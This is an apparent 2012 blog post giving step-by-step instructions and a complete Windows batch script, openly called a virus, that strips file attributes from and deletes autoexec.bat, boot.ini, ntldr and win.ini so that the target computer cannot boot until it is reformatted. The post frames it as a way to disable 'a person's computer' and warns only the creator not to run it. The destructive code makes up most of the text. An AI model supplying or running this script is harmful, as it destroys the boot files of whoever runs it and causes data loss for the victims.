Wednesday 12 September 2012

Make Your Computer to Never Reboot Till You Format It Up.


Basically this is a virus you program on notepad and save it as .bat file to delete the files needed
for booting up a pc.
Please follow the steps to create this virus:..
Open up notepad and copy , paste the code below. Save it as a .bat file.


@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

This will shut down a person’s computer and once it shuts down its never gona be boot up until
and unless it has been formatted.

REMEMBER - DO NOT OPEN THE .BAT FILE YOU CREATED. (for Noobs)
YOU WONT RECOVER YOUR COMPUTER BACK AFTER YOU OPEN THE .BAT FILE